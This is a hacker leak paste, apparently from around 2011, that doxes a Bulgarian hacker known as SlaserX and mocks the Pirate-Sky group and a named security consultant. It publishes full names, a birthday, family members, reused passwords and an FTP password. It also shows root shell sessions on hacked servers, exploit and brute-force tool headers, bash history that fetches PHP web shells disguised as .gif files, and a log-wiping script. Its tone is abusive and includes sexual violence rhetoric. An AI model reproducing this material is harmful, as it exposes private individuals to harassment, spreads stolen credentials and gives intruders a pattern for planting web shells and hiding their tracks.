  7. LOL > SlaserX < LOL
  8. LOL > Pirate-Sky < LOL
  9. LOL > SecurityGuy < LOL
  10. * LOL * SlaserX * LOL *
  11. SlaserX is a well-known criminal and wannabe hacker from Bulgaria. He's been around for quite some time now. A few weeks ago the miserable idiot and his fellow minions finally got busted and the misguided cops mistakenly claimed to have arrested the most powerful hacker group in Bulgaria[1]. Wait, what?!
  12. Cops, Y U so unbelievably stupid? You're nothing but miserable media whores. We've been fucking around with these kids and we certainly know how 1337 they are. We've got their passwords, we've been reading through their mail spools, we've been laughing at their hacking attempts and yet, you call them the most powerful hacker group. Yes, some of the most talented hackers worldwide are actually based in Eastern Europe, but you silly bitches won't ever hear about them. Suck on my hard cock and die, brainless cunts! How the fuck can you even be so stupid and lame?
  13. Take a seat, enjoy this leak and remember.. this is absolutely nothing compared to what we've done to you, idiots.
  14. [1] http://press.mvr.bg/en/News/news120704_08.htm
  15. >> So, who's this guy?
  16. First Name: Ivan
  17. Last Name: Bachvarov
  18. Nickname: SlaSerX
  19. Birthday: 21.07.1986
  20. Height: 1.76cm
  21. Father: Jecho Bachvarov
  22. Sister: Mariana Bachvarova
  23. Girlfriend: Mihaela Mandalcheva
  24. Location: Burgas, Bulgaria
  25. >> Let's take a look at what his passwords look like.
  26. vbox7.com (slaserx:1986125),
  27. hit.bg (slaserx:1986125),
  28. theunkn0wn.org (slaserx:1986125),
  29. kaldata.com (slaserx:1986125),
  30. bghelp.bg (slaserx:1986125),
  31. etc.
  32. >> Yes, password reuse is so typical for these idiots. You still call yourself a hacker? Here are some of his already owned mailboxes.
  33. >> Guess how 1337 his passwords were? ;) Now let's take a look at some of his boxes.
  34. [email protected]:/root# uname -a
  35. Linux bgdns 2.6.32-5-686 #1 SMP Wed Jan 12 04:01:41 UTC 2011 i686 GNU/Linux
  36. 23:15:45 up 6:26, 2 users, load average: 0.08, 0.09, 0.09
  37. USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
  38. root pts/0 office 16:51 6:23m 0.42s 0.42s -bash
  39. root pts/1 office 17:37 5:17m 0.34s 0.34s -bash
  40. [email protected]:/root# cat /etc/shadow
  85. >> Ever wondered what the most powerful hacker tools look like? Well, take a look..
  86. [email protected]:/root# head -25 l33t/a.pl
  87. #!/usr/bin/perl
  88. use IO::Socket;
  89. print q{
  90. #######################################################################
  91. # vBulletin. Version 4.0.1 Remote SQL Injection Exploit #
  92. # By indoushka #
  93. # www.iq-ty.com/vb #
  94. # Souk Naamane (00213771818860) #
  95. # Algeria Hackerz ([email protected]) #
  96. # Dork: Powered by vBulletin. Version 4.0.1 #
  97. #######################################################################
  98. };
  99. if (!$ARGV[2]) {
  100. print q{
  101. Usage: perl VB4.0.1.pl host /directory/ victim_userid
  102. perl VB4.0.1.pl www.vb.com /forum/ 1
  103. };
  104. [email protected]:/root# head -5 l33t/gen
  105. #!/usr/bin/perl
  106. ##
  107. ### bren.pl . Generate every character combination for 15 characters in length(ughh.)
  108. ##
  109. #
  110. [email protected]:/root# head -30 l33t/t.pl
  111. #!/usr/bin/perl
  112. use IO::Socket;
  113. use LWP::Simple;
  114. use MIME::Base64;
  115. $host = $ARGV[0];
  116. $user = $ARGV[1];
  117. $port = $ARGV[2];
  118. $list = $ARGV[3];
  119. $file = $ARGV[4];
  120. $url = "http://".$host.":".$port;
  121. if(@ARGV < 3){
  122. print q(
  123. ###############################################################
  124. # Cpanel Password Brute Force Tool #
  125. ###############################################################
  126. # usage : cpanel.pl [HOST] [User] [PORT][list] [File] #
  127. #-------------------------------------------------------------#
  128. # [Host] : victim Host (simorgh-ev.com) #
  129. # [User] : User Name (demo) #
  130. # [PORT] : Port of Cpanel (2082) #
  131. #[list] : File Of password list (list.txt) #
  132. # [File] : file for save password (password.txt) #
  133. # #
  134. ###############################################################
  135. # (c)oded By Hessam-x / simorgh-ev.com #
  136. ###############################################################
  137. );exit;}
  138. [email protected]:/root# tar tvf tools.tar
  139. drwxr-xr-x root/root 0 2011-02-11 11:14 tools/
  140. -rwxr-xr-x root/root 904 2011-01-15 18:18 tools/stop.flood
  141. -rwxr-xr-x root/root 700 2011-01-15 18:21 tools/monitor
  142. -rw-r--r-- slaserx/slaserx 1800 2011-02-11 11:11 tools/shells.zip
  143. -rwxr-xr-x root/root 1853 2011-02-07 18:30 tools/check.ssh
  144. drwxr-xr-x root/root 0 2011-01-16 19:45 tools/sms/
  145. -rwxr-xr-x root/root 1360 2011-01-16 19:26 tools/sms/212.70.159.86
  146. -rwxr-xr-x root/root 1332 2011-01-16 19:41 tools/sms/212.70.159.82-m
  147. -rwxr-xr-x root/root 1326 2011-01-16 19:42 tools/sms/212.70.159.86-m
  148. -rwxr-xr-x root/root 1271 2011-01-16 19:30 tools/sms/7.7.7.7
  149. -rwxr-xr-x root/root 1331 2011-01-16 19:43 tools/sms/212.70.159.87-m
  150. -rwxr-xr-x root/root 630 2011-01-19 09:47 tools/sms/run
  151. -rwxr-xr-x root/root 1333 2011-01-16 19:42 tools/sms/212.70.159.83-m
  152. -rwxr-xr-x root/root 1365 2011-01-16 19:27 tools/sms/212.70.159.87
  153. -rwxr-xr-x root/root 1367 2011-01-16 18:50 tools/sms/212.70.159.83
  154. -rwxr-xr-x root/root 1366 2011-01-16 18:49 tools/sms/212.70.159.82
  155. -rwxr-xr-x root/root 1332 2011-01-16 19:40 tools/sms/94.156.142.99-m
  156. -rwxr-xr-x root/root 1366 2011-01-16 18:45 tools/sms/94.156.142.99
  157. -rwxr-xr-x root/root 528 2011-01-15 18:20 tools/unban
  158. -rwxr-xr-x root/root 526 2011-01-15 18:19 tools/ban
  159. -rwxr-xr-x root/root 136 2011-01-15 18:36 tools/grep.404
  160. -rwxr-xr-x root/root 468 2011-01-15 18:35 tools/logged
  161. -rwxr-xr-x root/root 302 2011-01-15 18:22 tools/dellog
  162. -rw-r--r-- root/root 14 2011-02-07 18:30 tools/bannedips.txt
  163. drwxr-xr-x root/root 0 2011-02-11 14:38 tools/shells/
  164. -rwxr-xr-x root/root 143 2010-07-16 13:41 tools/shells/find.r57
  165. -rwxr-xr-x root/root 12 2010-07-16 13:45 tools/shells/a
  166. -rwxr-xr-x root/root 144 2010-07-16 13:56 tools/shells/find.eval
  167. -rwxr-xr-x root/root 178 2010-07-16 14:35 tools/shells/find.shell
  168. -rwxr-xr-x root/root 144 2010-07-16 13:45 tools/shells/find.rt13
  169. -rwxr-xr-x root/root 153 2010-07-16 13:49 tools/shells/find.decode
  170. -rwxr-xr-x root/root 34461 2011-02-11 14:40 tools/shells/scan.txt
  171. -rwxr-xr-x root/root 143 2010-06-30 14:57 tools/shells/find.c99
  172. drwxr-xr-x root/root 0 2011-02-04 20:46 tools/backup/
  173. -rwxr-xr-x root/root 641 2011-02-04 20:44 tools/backup/backup-rsbg
  174. -rwxr-xr-x root/root 657 2011-02-04 20:45 tools/backup/backup-slaserx
  175. -rwxr-xr-x root/root 271 2011-02-07 11:23 tools/backup/run
  176. -rwxr-xr-x root/root 650 2011-02-04 20:41 tools/backup/backup-psc
  177. [email protected]:/root# tar tzvf t.tar.gz
  178. drwxr-xr-x root/root 0 2011-03-01 20:20 l33t/
  179. -rwxr-xr-x root/root 2358 2011-02-28 17:26 l33t/a.pl
  180. -rwxr-xr-x root/root 961923 2011-02-27 01:31 l33t/list.txt
  181. -rwxr-xr-x root/root 18883 2010-12-20 01:09 l33t/slowloris.pl
  182. -rwxr-xr-x root/root 156 2011-03-01 18:17 l33t/test.txt
  183. -rwxrwxrwx root/root 11 2011-02-28 17:26 l33t/a
  184. -rwx--x--x root/root 66502 2011-02-27 06:46 l33t/list.txt.save
  185. -rw-r--r-- root/root 20056 2011-03-01 20:21 l33t/ssh2ftpcrack.tar.bz2
  186. -rwxr-xr-x root/root 2109 2011-02-27 00:51 l33t/t.pl
  187. -rwxr-xr-x root/root 6359 2011-02-27 00:52 l33t/gen
  188. [email protected]:/root# cat .bash_alias
  189. # some more ls aliases
  190. alias less='less -SR'
  191. alias l='ls -lLBhX --time-style=locale'
  192. alias la='ls -la $1 | less'
  193. alias ll='ls -lX'
  194. alias lx='ls -lXB' #sort by ext
  195. alias lk='ls -lSr' #soft by size
  196. # Alias's to modifed commands
  197. alias ps='ps auxf'
  198. alias home='cd ~'
  199. alias pg='ps aux | grep' #requires an argument
  200. alias lg='ls -la | grep' #requires an argument
  201. alias un='tar -zxvf'
  202. alias df='df -hT'
  203. alias ping='ping -c 10'
  204. #alias net-restart='sudo /etc/init.d/networking restart'
  205. #alias windir="cd '/home/hkvn/.wine/drive_c/Program Files'"
  206. alias ..='cd ..'
  207. alias update='sudo apt-get update'
  208. alias upgrade='sudo apt-get upgrade'
  209. alias install='sudo apt-get install'
  210. alias remove='sudo apt-get remove'
  211. #alias eclipse='eclipse -vmargs -Xmx512M'
  212. #alias firefox='firefox-3.5'
  213. alias ipconfig='ifconfig -a'
  214. #My alias
  215. alias flood='netstat'
  216. alias stop='/root/tools/stop.flood'
  217. alias ban='/root/tools/ban.pl'
  218. alias unban='/root/tools/unban.pl'
  219. alias monitor='/root/tools/monitor.sh'
  220. alias cron='env EDITOR=nano crontab -e'
  221. alias editcfg='pico /var/www/ispcp/gui/index.php'
  222. alias arest='/etc/init.d/apache2 restart'
  223. alias cls='clear'
  224. alias q='exit'
  225. # Some ssh connections
  226. alias shell='ssh -l slaserx slaserx.ath.cx'
  227. #alias xalo='sudo vpnc-connect xalo.conf'
  228. # Some ping commands
  229. #alias pga='ping 192.168.1.1 -c 10'
  230. #alias pgo='ping google.com -c 10'
  231. #alias phk='ping hkvn.info -c 10'
  232. #alias pch='ping chuyenhungyen.org -c 10'
  233. #Some chmod commands
  234. alias mx='chmod a+x'
  235. alias 000='chmod 000'
  236. alias 644='chmod 644'
  237. alias 755='chmod 755'
  238. # cat .bash_history
  239. clear
  240. nmap localhost
  241. exit
  242. host perfektno.com
  243. w
  244. iptables -L |grep 77.78.36.40
  245. ban 77.78.36.40
  246. pico /etc/init.d/firewall
  247. ls -a
  248. iptables -L
  249. clear
  250. search metaspolit
  251. search metasploit
  252. search icmp rate
  253. pico /etc/init.d/firewall
  254. iptables -L
  255. stop
  256. flood
  257. clear
  258. exit
  259. pico /etc/networks
  260. pico /etc/network/interfaces
  261. exit
  262. host cs-adrenalines.info
  263. host 79.124.67.194
  264. stop
  265. flood
  266. cat /var/log/fail2ban.log
  267. cat /var/log/psad/fw_check
  268. cat /var/log/psad/top_attackers
  269. clear
  270. clear
  271. stop
  272. exit
  273. cd l33t/
  274. wget https://cirt.net/nikto/nikto-2.1.4.tar.bz2
  275. ls -a
  276. wget
  277. wget --help
  278. wget --help |grep ssl
  279. wget --no-check-certificate https://cirt.net/nikto/nikto-2.1.4.tar.bz2
  280. tar -jxvf nikto-2.1.4.tar.bz2
  281. cd nikto-2.1.4/
  282. ls -a
  283. ./nikto.pl
  284. ./nikto.pl -host abv.bg -root
  285. ./nikto.pl -host abv.bg -root+
  286. ./nikto.pl -host abv.bg
  287. ./nikto.pl
  288. ./nikto.pl -host
  289. ./nikto.pl -host pweb.co.cc
  290. w
  291. last
  292. flood
  293. stop
  294. apachectl restart
  295. stop
  296. apachectl restart
  297. cd /root/tools/
  298. ./dellog
  299. cat /var/log/apache2/pirate-sky.info-combined.log
  300. cat /var/log/apache2/pirate-sky.info-combined.log
  301. cat /var/log/apache2/pirate-sky.info-combined.log
  302. iptables -L
  303. host eco.gov.kz
  304. cat /var/log/apache2/pirate-sky.info-combined.log
  305. apachectl restart
  306. apachectl restart
  307. ls -a
  308. cron
  309. cron
  310. /etc/init.d/cron restart
  311. cd /var/www/virtual/warez-database.org/htdocs/
  312. ls -a
  313. cd hooks/
  314. ls -a
  315. cd ..
  316. ls -a
  317. cd converge_local/
  318. ls -a
  319. ls -a
  320. ls -a
  321. wget xpls.hit.bg/shell/shell.gif
  322. rm -rf shell.gif
  323. wget xpls.hit.bg/shell/linuxbg.shell
  324. wget xpls.hit.bg/shell/linuxbg.gif
  325. rm -rf linuxbg.*
  326. ls -a
  327. ls -a
  328. mv /home/slaserx/faq.php ./
  329. ls -a
  330. rm -rf .htaccess
  331. ls -a
  332. rm -rf faq.php
  333. /
  334. cd /
  335. pico /var/www/virtual/linuxbg.info/htdocs/pr00f/index.php
  336. pico /var/www/virtual/linuxbg.info/htdocs/pr00f/index.php
  337. clear
  338. whois privatecrew.net
  339. whois privatecrew.net
  340. whois bgdns.info
  341. host freebsd.bg
  342. clear
  343. genpasswd
  344. clear
  345. genpasswd
  346. genpasswd
  347. genpasswd
  348. ls -a
  349. cd /var/www/virtual/privatecrew.net/htdocs/
  350. ls -s
  351. ls -a
  352. rm -rf *
  353. ls -a
  354. ls -a
  355. cd ..
  356. cp ../pirate-sky.info/backups/pirate-sky.info-backup-2011.03.06-000737.tar.bz2 ./
  357. ls -a
  358. cat ../pirate-sky.info/htdocs/conf_global.php
  359. ls -a
  360. cp pirate-sky.info-backup-2011.03.06-000737.tar.bz2 backups/
  361. clear
  362. ls -a
  363. rm -rf pirate-sky.info-backup-2011.03.06-000737.tar.bz2
  364. rm -rf backups/pirate-sky.info-backup-2011.03.06-000737.tar.bz2
  365. genpasswd
  366. genpasswd
  367. genpasswd
  368. ls -a
  369. cd htdocs/
  370. ls -a
  371. pico /etc/init.d/firewall
  372. cat /etc/init.d/firewall
  373. iptables -t filter -A INPUT -s 95.42.32.36 -j ACCEPT
  374. pico /etc/init.d/firewall
  375. /etc/init.d/firewall
  376. flood
  377. stop
  378. ls -a
  379. iptables -L |grep 94.156.142.66
  380. iptables -L |grep lucifer
  381. stop
  382. iptables -L |grep 95.42.32.36
  383. iptables -L
  384. cd /var/www/fcgi/
  385. ls -a
  386. pico warez-database.org/php5/php.ini
  387. pico privatecrew.net/php5/php.ini
  388. pico privatecrew.net/php5/php.ini
  389. apachectl restart
  390. pico privatecrew.net/php5/php.ini
  391. apachectl restart
  392. ls -a
  393. pico pirate-sky.com/php5/php.ini
  394. pico privatecrew.net/php5/php.ini
  395. apachectl restart
  396. cd /root/tools/
  397. ls -a
  398. cd shells/
  399. pico new.p
  400. pico new
  401. ls -a
  402. ./a
  403. ls -a
  404. pico find.r57
  405. pico new
  406. ./find.
  407. ./new
  408. ls -a
  409. ls -a
  410. cd /var/www/virtual/
  411. ls -a
  412. cd privatecrew.net/htdocs/
  413. cd /root/tools/
  414. cd shells/
  415. ./new
  416. ls -a
  417. pico new
  418. pico find.eval
  419. ls -a
  420. pico new
  421. pico new
  422. ./new
  423. ls -a
  424. pico new
  425. ls -a
  426. ./new
  427. ls -a
  428. pico new
  429. ls -a
  430. ./new
  431. pico new
  432. ./new
  433. ls -a
  434. rm -rf new
  435. pico find.shell
  436. cat scan.txt
  437. pico scan.txt
  438. rm -rf scan.txt
  439. ls -a
  440. ./find.shell
  441. ls -a
  442. cat scan.txt
  443. ls -a
  444. rm -rf scan.txt
  445. cat sc
  446. ls -a
  447. pico find.shell
  448. pico find.shell
  449. ./find.shell
  450. cat scan.txt
  451. rm -rf scan.txt
  452. ls -a
  453. ./find.shell
  454. cat scan.txt
  455. cat scan.txt |grep faq.php
  456. ls -a
  457. rm -rf scan.txt
  458. pico /var/www/virtual/privatecrew.net/htdocs/faq.php
  459. pico find.shell
  460. ls -a
  461. ./find.
  462. ./find.shell
  463. cat scan.txt
  464. ls -a
  465. clear
  466. cd /var/www/virtual/
  467. ls -a
  468. cd privatecrew.net/
  469. ls -a
  470. cd htdocs/
  471. cd 0893552070/
  472. ls -a
  473. wget http://xpls.hit.bg/shell/c99.gif
  474. wget http://xpls.hit.bg/shell/devil.gif
  475. wget http://xpls.hit.bg/shell/linux.gif
  476. ls -a
  477. mv linux.gif linux.php
  478. ls -a
  479. mv devil.gif devil.php
  480. mv c99.gif c99.php
  481. ls -a
  482. wget http://xpls.hit.bg/shell/shell.gif
  483. mv shell.gif shell.php
  484. ls -a
  485. ls -a
  486. ls -a
  487. ls -a
  488. ls -a
  489. ls -a
  490. ls -a
  491. cp linux.php /var/www/virtual/linuxbg.info/htdocs/pr00f/forum/ranks/
  492. rm -rf /var/www/virtual/linuxbg.info/htdocs/pr00f/forum/ranks/linux.php
  493. ls -a
  494. ls -a
  495. ls -a
  496. clear
  497. ls -a
  498. cd ..
  499. rm -rf 0893552070/
  500. ls -a
  501. exit
  502. ls -a
  503. ls -a
  504. cd /var/www/virtual/pirate-sky.
  505. cd /var/www/virtual/privatecrew.net/htdocs/
  506. ls -a
  507. cd a
  508. ls -a
  509. cd asd/
  510. ls -a
  511. ls -a
  512. ls -a
  513. ls -a
  514. ls -a
  515. ls -a
  516. ls -a
  517. ls -a
  518. ls -a
  519. ls -a
  520. ls -a
  521. ls -a
  522. ls -a
  523. ls -a
  524. ls -a
  525. ls -a
  526. ls -a
  527. rm crontab -l
  528. crontab -l
  529. ls -a
  530. ls -a
  531. ls -a
  532. ls -a
  533. ls -a
  534. ls -a
  535. ls -a
  536. cd ..
  537. ls -a
  538. ls -a
  539. rm -rf admin/
  540. rm -rf cache/
  541. rm -rf con*
  542. ls -a
  543. rm -rf includes/
  544. ls -a
  545. ls -a
  546. rm -rf interface/
  547. rm -rf ips_kernel/
  548. ls -a
  549. rm -rf public/
  550. rm -rf starforum/
  551. ls -a
  552. rm -rf uploads/
  553. ls -a
  554. ls -a
  555. ls -a
  556. cd ..
  557. cd htdocs/
  558. cd ..
  559. cd backups/
  560. ls -a
  561. cp ../../pirate-sky.info/backups/pirate-sky.info-backup-2011.03.06-000737.tar.bz2
  562. cp ../../pirate-sky.info/backups/pirate-sky.info-backup-2011.03.06-000737.tar.bz2 ./
  563. ls -a
  564. pico /etc/crontab
  565. ls -a
  566. cd ..
  567. ls -a
  568. cd htdocs/
  569. ls -a
  570. cd ..
  571. cd backups/
  572. rm -rf pirate-sky.info-backup-2011.03.06-000737.tar.bz2
  573. cd ..
  574. cd htdocs/
  575. cd pp/
  576. ls -a
  577. ls -a
  578. ls -a
  579. ls -a
  580. ls -a
  581. ls -a
  582. host mikrotik-bg.net
  583. host 195.191.149.89
  584. cat /var/log/cron.log
  585. ls -a
  586. crontab -l
  587. cron
  588. /etc/init.d/cron restart
  589. /etc/init.d/cron status
  590. ls -a
  591. ls -a
  592. cat /var/log/cron.log
  593. cat /var/log/cron.log |grep err
  594. clear
  595. ls -a
  596. ls -a
  597. ls -a
  598. ls -a
  599. ls -a
  600. ls -a
  601. ls -a
  602. ls -a
  603. ls -a
  604. ls -a
  605. ls -a
  606. ls -a
  607. cat /var/log/cron.log
  608. ls -a
  609. ls -a
  610. crontab -l
  611. ls -a
  612. ls -a
  613. cat /var/log/cron.log
  614. ls -a
  615. ls -a
  616. ls -a
  617. ls -a
  618. ls -a
  619. ls -a
  620. ls -a
  621. ls -a
  622. ls -a
  623. ls -a
  624. ls -a
  625. ls
  626. ls
  627. ls -a
  628. ls -a
  629. ls -a
  630. ls -a
  631. ls -a
  632. ls -la
  633. ls -a
  634. ls -a
  635. ls -a
  636. ls -a
  637. ls -a
  638. cat /var/log/cron.log
  639. ls -a
  640. ls -a
  641. ls -a
  642. ls -a
  643. ls -a
  644. ls -a
  645. wget xpls.hit.bg/shell.gif
  646. wget xpls.hit.bg/linux.gif
  647. mv linux.gif linux.php
  648. mv shell.gif shell.php
  649. ls -a
  650. ls -a
  651. ls -a
  652. ls -a
  653. ls -a
  654. ls -a
  655. ls -a
  656. ls -a
  657. rm -rf /tmp/scan.txt
  658. ls -a
  659. ls -a
  660. ls -la
  661. ls -a
  662. ls -a
  663. ls -a
  664. pico linux.php
  665. ls -a
  666. rm -rf linux.php
  667. rm -rf shell.php
  668. ls -a
  669. ls -a
  670. wget xpls.hit.bg/shell/shell.gif
  671. wget xpls.hit.bg/shell/linux.gif
  672. mv linux.gif linux.php
  673. mv shell.gif shell.php
  674. pico shell.php
  675. ls -a
  676. pico shell.php
  677. ls -a
  678. wget xpls.hit.bg/shell/shell.gif
  679. mv linux.gif linux.php
  680. wget xpls.hit.bg/shell/linux.gif
  681. ls -a
  682. mv linux.gif linux.php
  683. mv shell.gif shell.php
  684. ls -a
  685. ls -a
  686. ls -a
  687. ls -a
  688. ls -a
  689. cat /tmp/scan.txt
  690. ls -a
  691. ls -a
  692. ls -a
  693. ls -a
  694. cat /var/log/cron.log
  695. ls -a
  696. ls -a
  697. ls -a
  698. ls -a
  699. ls -a
  700. ls -a
  701. ls -a
  702. ls -a
  703. ls -a
  704. cd ..
  705. cd ..
  706. cd ..
  707. cd ..
  708. exit
  709. cd /var/www/virtual/
  710. ls -a
  711. cd linuxbg.info/
  712. cd backups/
  713. ls -a
  714. rm -rf t3es_vb.sql.bz2
  715. ls -a
  716. rm -rf t3es_soze.sql.bz2
  717. ls -a
  718. whois cms-bg.com
  719. whois jump.bg
  720. stop
  721. cat /tmp/scan.txt
  722. cat /var/log/apache2/other_vhosts_access.log
  723. cat /var/log/apache2/default-error.log
  724. clear
  725. cat /var/log/apache2/default-error.log
  726. clear
  727. cat /var/log/apache2/default-error.log
  728. cat /var/log/apache2/default-error.log
  729. cat /var/log/apache2/default-error.log
  730. clear
  731. clear
  732. clear
  733. exit
  734. os -a
  735. pico /etc/init.d/firewall
  736. ping abv.bg
  737. ls -a
  738. exit
  739. [email protected]:/root/tools/backup# cat backup-psc
  740. #!/bin/sh
  741. #Created by SlaSerX
  742. #red='1;31m'
  743. TARGET_EMAIL="[email protected]"
  744. # local directory to pickup *.tar.gz file
  745. tar zcvf /backup/psc/pirate-sky.$(date +%s).$(date +"%d-%m-%Y").tgz /var/www/virtual/pirate-sky.com/backups/
  746. # ftp remote connections
  747. FTPU="backup" # ftp login name
  748. FTPP="1986125" # ftp password
  749. FTPS="85.217.204.199" # remote ftp server
  750. FTPF="/home/backup/psc/" # remote ftp server directory for $FTPU & $FTPP
  751. LOCALD="/backup/psc/*.tgz"
  752. ncftpput -m -u $FTPU -p $FTPP $FTPS $FTPF $LOCALD
  753. echo
  754. echo -e " \e[${red} Upload psc Backup \e[m"
  755. echo 'pirate-sky' | mail -s "Backup Uploaded:" $TARGET_EMAIL
  756. echo
  757. [email protected]:/root/tools# head -10 check.ssh
  758. #!/usr/bin/perl
  759. ##############################################################################
  760. # By BumbleBeeWare.com 2006
  761. # SSH Log Checker
  762. # sshlogcheck.cgi
  763. # reads ssh log and blocks hacking attempts using ip tables
  764. ##############################################################################
  765. # CONFIGURE
  766. ##############################################################################
  767. [email protected]:/root/tools# cat dellog
  768. #!/bin/bash
  769. #Created by SlaSerX
  770. red='1;31m'
  771. /bin/rm -rf /var/log/apache2/*.log
  772. /bin/rm -rf /var/log/apache2/*.log.*
  773. /bin/rm -rf /var/log/apache2/users/*.log
  774. /bin/rm -rf /var/log/apache2/users/*.log.*
  775. /etc/init.d/apache2 restart
  776. echo -e " \e[${red} Apache logs Erase. Apache has been restarted\e[m"
  777. [email protected]:/root/tools# cat grep.404
  778. grep "404" /var/log/apache2/users/pirate-sky.com-access.log | grep "`date +%d/%b/%Y`" | mailx -s 'SUBJECT GOES HERE' 'r[email protected]'
  779. >> Refer to the URL at the end of the file for some more fun.
  780. * LOL * Pirate-Sky * LOL *
  781. Lamez.org, Pirate-Sky, World Warez Crew, CyberWarrior Invasion Group, etc. are all the same bitches and idiots again and again. They've been continuously renaming their own groups due to all kind of spectacular fails during the years. These are basically brainless infants playing with SQLmap and defacing outdated and improperly configured CMSs.
  782. You can clearly see how randomly they choose their targets -
  783. http://www.zone-h.org/archive/notifier=Cyber%20Warrior%20Invasion
  784. >> Check the aforementioned URL for their databases. ;)
  785. * LOL * SecurityGuy * LOL *
  786. Alexander Sverdlov a.k.a. the SecurityGuy is one of those pseudo-security whores that you'd like to publicly rape. This information security illiterate has been making money through consultancy and training services for ages. Giving your money to this miserable monkey will eventually boost your false sense of security, but nothing more or less. Beware of who you're entrusting your security decisions. Really.
  787. >> Let's just briefly review what's this bitch up to.
  788. [email protected] [/home/nopasara/public_html/securityguy]# uname -a
  789. Linux hera.superhosting.bg 2.6.18-194.32.1.el5 #1 SMP Wed Jan 5 17:52:25 EST 2011 x86_64 x86_64 x86_64 GNU/Linux
  790. [email protected] [/home/nopasara/public_html/securityguy]# id
  791. uid=32684(nopasara) gid=32686(nopasara) groups=32686(nopasara)
  792. [email protected] [/home/nopasara]# ls -lia
  793. total 28108
  794. 35897345 drwx--x--x 18 nopasara nopasara 4096 Mar 12 14:04 ./
  795. 2 drwx--x--x 660 root root 20480 Mar 19 16:50 ../
  796. 35897557 -rw------- 1 nopasara nopasara 3048 Jan 18 2010 .bash_history
  797. 35897347 -rw-r--r-- 1 nopasara nopasara 33 Dec 10 2008 .bash_logout
  798. 35897346 -rw-r--r-- 1 nopasara nopasara 176 Dec 10 2008 .bash_profile
  799. 35897348 -rw-r--r-- 1 nopasara nopasara 124 Dec 10 2008 .bashrc
  800. 35897357 -rw------- 1 nopasara nopasara 17 Dec 10 2008 .contactemail
  801. 35897376 drwx------ 5 nopasara nopasara 4096 Mar 4 11:07 .cpanel/
  802. 35897878 -rw------- 1 nopasara nopasara 15 Dec 31 2008 .cpanel-logs
  803. 35897520 -rw-r--r-- 1 nopasara nopasara 6 Mar 20 02:45 .dns
  804. 35897450 drwxr-x--- 7 nopasara nopasara 4096 Feb 25 2010 .fantasticodata/
  805. 35897436 -rw------- 1 nopasara nopasara 17 Feb 18 01:53 .ftpquota
  806. 35897353 drwxr-x--- 3 nopasara nobody 4096 Jan 4 2009 .htpasswds/
  807. 35897354 -rw------- 1 nopasara nopasara 12 Mar 4 10:44 .lastlogin
  808. 35897419 drwx------ 2 nopasara nopasara 4096 Dec 19 2008 .trash/
  809. 35898508 -rw------- 1 nopasara nopasara 1808 Jan 18 2010 .viminfo
  810. 35897374 lrwxrwxrwx 1 nopasara nopasara 34 Dec 10 2008 access-logs -> /usr/local/apache/domlogs/nopasara/
  811. 35946500 drwxr-xr-x 2 nopasara nopasara 4096 Nov 25 15:44 backups/
  812. 35897650 -rw-r----- 1 nopasara nopasara 1 Dec 27 2008 cpbackup-exclude.conf
  813. 36209930 drwxr-xr-x 3 nopasara nopasara 4096 Jul 26 2009 default/
  814. 35897906 drwxr-xr-x 2 nopasara nopasara 4096 Apr 12 2009 docs/
  815. 35897349 drwxr-x--- 3 nopasara mail 4096 Feb 6 16:07 etc/
  816. 36044801 drwx------ 2 nopasara nopasara 12288 Feb 28 15:20 logs/
  817. 35897351 drwxrwx--- 7 nopasara nopasara 4096 Apr 21 2010 mail/
  818. 35963400 drwxr-xr-x 2 nopasara nopasara 4096 Jan 16 2010 mysql/
  819. 35898497 -rw-r--r-- 1 nopasara nopasara 4128921 Jan 10 2010 nopasara_blog.sql
  820. 35897470 -rw-r--r-- 1 nopasara nopasara 723362 Feb 13 18:25 nopasara_emea.sql
  821. 35897856 -rw-r--r-- 1 nopasara nopasara 38813 Feb 15 13:28 php.ini
  822. 35932502 drwxr-xr-x 3 nopasara nopasara 4096 Jan 27 2010 procedures/
  823. 35897355 drwxr-xr-x 3 nopasara nopasara 4096 Nov 6 2005 public_ftp/
  824. 35897352 drwxr-x--- 22 nopasara nobody 4096 Feb 28 01:31 public_html/
  825. 35898505 -rw-r--r-- 1 nopasara nopasara 23699498 Jan 18 2010 sverdlov.sql
  826. 35913892 drwxr-xr-x 2 nopasara nopasara 4096 May 20 2009 test/
  827. 35897350 drwxr-xr-x 7 nopasara nopasara 4096 Mar 4 11:07 tmp/
  828. 35897358 lrwxrwxrwx 1 nopasara nopasara 11 Dec 10 2008 www -> public_html/
  829. [email protected] [/home/nopasara/public_html]# ls -lia
  830. total 2286196
  831. 35897352 drwxr-x--- 22 nopasara nobody 4096 Feb 28 01:31 ./
  832. 35897345 drwx--x--x 18 nopasara nopasara 4096 Mar 12 14:04 ../
  833. 35897364 -rw-r--r-- 1 nopasara nopasara 0 Feb 13 23:17 .htaccess
  834. 35967226 drwxr-xr-x 2 nopasara nopasara 4096 Jul 5 2009 _notes/
  835. 35897444 drwxr-xr-x 6 nopasara nopasara 4096 Jan 16 15:28 bgsecrets.com/
  836. 35947140 drwxr-xr-x 2 nopasara nopasara 4096 Feb 19 02:32 blog/
  837. 35947141 drwxr-xr-x 2 nopasara nopasara 4096 Feb 19 02:32 cdn/
  838. 37601282 drwxr-xr-x 2 nopasara nopasara 4096 Oct 4 18:47 cgi-bin/
  839. 35947142 drwxr-xr-x 2 nopasara nopasara 4096 Feb 19 02:32 cmdb/
  840. 35947139 drwxr-xr-x 2 nopasara nopasara 4096 Feb 19 02:32 crm/
  841. 36129979 drwxr-xr-x 10 nopasara nopasara 4096 Jan 12 2010 demo/
  842. 35930169 drwxr-xr-x 5 nopasara nopasara 4096 Mar 17 12:35 emeastudio/
  843. 35947143 drwxr-xr-x 2 nopasara nopasara 4096 Feb 19 02:32 eye/
  844. 35897426 -rw-r--r-- 1 nopasara nopasara 0 Feb 13 23:17 index.php
  845. 35980080 drwxr-xr-x 6 nopasara nopasara 4096 Jan 28 12:07 ioscompatible.com/
  846. 35897530 -rw-r--r-- 1 nopasara nopasara 2338684928 Feb 28 01:23 nfs.iso
  847. 37751973 drwxr-xr-x 3 nopasara nopasara 4096 Jan 6 21:24 png/
  848. 36094784 drwxr-xr-x 8 nopasara nopasara 4096 Mar 20 02:37 securityguy/
  849. 35948620 drwxr-xr-x 5 nopasara nopasara 4096 Mar 5 01:53 studioburgas/
  850. 36241410 drwxr-xr-x 8 nopasara nopasara 4096 Feb 6 15:19 sverdlov.net/
  851. 35964452 drwxr-xr-x 2 nopasara nopasara 4096 Jan 30 23:07 test/
  852. 35930404 drwxr-xr-x 5 nopasara nopasara 4096 Dec 29 21:25 topusahostingproviders.com/
